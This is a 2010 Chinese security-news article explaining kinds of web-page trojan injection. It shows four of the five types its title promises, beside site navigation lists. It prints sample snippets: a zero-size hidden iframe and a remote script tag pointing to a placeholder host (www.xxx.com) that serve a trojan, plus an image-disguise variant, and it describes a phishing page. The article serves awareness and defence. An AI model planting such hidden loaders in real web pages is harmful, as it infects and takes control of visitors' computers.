RSS订阅
服安最新信息资讯
服安资讯热点推荐
- 网页挂马的五种类型
- 七种简便方法防止网络钓鱼
- 网络服务器防止被黑安全经验谈
- 菜鸟安全手册:实战捕获局域网
- 网站挂马简要分析 保障个人网络安
- 什么是网页“挂马”?啥叫挂马?
- “木马”隐藏技俩与检查清除的技
- 教你反击令人防不胜防的JS挂马问题
- 教你防范网页木马 入侵原理完全解
- 黑客攻防技术须知:从两大方面阻
- 学会如何巧妙从进程中判断出病毒
- Linux服务器被黑 知识点全面讲解
- 加固系统 对黑客扫描说“不”
- 揭示木马工作原理
- 若要彻底剔除数据中的恶意软件 需
- 浅谈黑客入侵的四条途径
- 我看暴库漏洞原理及规律
- 使用QQ防止账号被盗被骗小经验
服安资讯阅览排行
- 使用iptables来防止web服务器被CC攻击
- SQL Server提升权限相关命令及防范
- 浅谈下黑客入侵的四条常规途径手
- 想到一个防止cookie欺骗的办法
- 教你防范网页木马 入侵原理完全解
- 用Win7磁盘配额管理把黑客关在门外
- 我看暴库漏洞原理及规律
- Linux服务器被黑 知识点全面讲解
- 社交网络2010年将成黑客攻击重点目
- 实例分析Flash木马 时刻警惕网络安
- MSSQL的脚本注入攻击与安全防护
- 网站挂马简要分析 保障个人网络安
- 防范:黑客入住系统建立帐户
- 危险无处不在 账号防盗防骗的小经
- 步步为营 揪出局域网“内鬼”
- 什么是网页“挂马”?啥叫挂马?
信息安全法律法规
- 信息安全等级保护管理办法
- 广东省计算机信息系统安全保护条
- 欧盟网络和信息安全法律规制及其
- 中国国家信息安全等级保护制度开
- 互联网上网服务营业场所管理条例
- 互联网电子公告服务管理规定
- 浪潮服务器安全技术要求成为国家
- 计算机信息网络国际联网安全保护
服务器安全技术资讯
- 深入挖掘Oracle内部SQL注入
- 什么是MPLS中的FEC?
- 如何让域控DC的AD更加安全
- 实例:Linux中如何查看服务及监听端
- 服务器安全检查十大要素
- 什么叫0day?0day是什么?
- 网络高手推荐的三大系统漏洞扫描
- 巧补Tomcat服务器漏洞
服安解决方案
网页挂马的五种类型
来源:服安资讯 时间:2010-02-25 作者:秩名 点击:次 责任编辑:Flyfox
TAG:
类型
网页
挂马
服务器安全应急处理中心:让您的服务器更安全! 进入安全讨论社区
网页挂马就是攻击者通过在正常 的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
1、框架嵌入式网络挂马
网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最 早也是最有效的的一种网络挂马技术。通常的挂马代码如下:
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> |
解释:在打开插入该句代码的网页后,就也就打开了http://www.xxx.com /muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。下面我们做过做个演示,比如在某网页中插入如下代码:
<iframe src=http://tech.ccidnet.com/security width=200 height=200></iframe> |
在“百度”中嵌入了“赛迪IT技术安全版块”的页面,效果如图1。(图1)
2、js调用型网页挂马
js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先 制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下:
<script language=javascript src=http://www.xxx.com/gm.js></script> |
http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行 木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了,如图2就是一个JS木马的代码。(图2)
3、图片伪装挂马
随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击 者将类似: http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只 需输入相关的选项就可以了,如图3。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
<html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0></iframe> <ccid_file values="http://www" src="http://www.xxx.com/test.jpg" /></center> </html> |
注:当用户打开http://www.xxx.com/test.htm是,显示给用户的是 http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm网页代码也随之运行。(图3)
4、 网络钓鱼挂马(也称为伪装调用挂马)
网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一 个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信 息,然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码,如图4。(图4)
服务器安全资讯网(Fuancn.CN)登载此文仅为传递更多信息之目的,并不意味着赞同其观点或证实其描述。
上一篇:最易被“挂马”的四大类网站及其防范 下一篇:没有了
相关文章列表
- 网页挂马的五种类型
- 最易被“挂马”的四大类网站及其
- 什么是网页“挂马”?啥叫挂马?
- 用Win7磁盘配额管理把黑客关在门外
- 数据库系统防黑客入侵技术综述
- 黑客盯上补习班 近千培训网站被挂
- 黑客攻防技术须知:从两大方面阻
- 防范:黑客入住系统建立帐户
- 追捕技术:让黑客无处可逃
- Windows服务器是如何受到攻击的?
- 社交网络2010年将成黑客攻击重点目
- “黑客社会工程学”攻击的八种常
- 解析系统管理员应如何防范黑客攻
- 浅谈下黑客入侵的四条常规途径手
- SQL Server提升权限相关命令及防范
- MSSQL的脚本注入攻击与安全防护
- 黑客社会工程学攻击的八种常用伎
- 我看暴库漏洞原理及规律
- PHP webshell检查工具 python版
- 教你防范网页木马 入侵原理完全解
- 实例分析Flash木马 时刻警惕网络安
- 网站挂马简要分析 保障个人网络安
- 让木马为我们工作 借其隐身技巧来
- 危险无处不在 账号防盗防骗的小经
相关图片列表
|
|
|
|
|
|
|
|
|
|
|
|
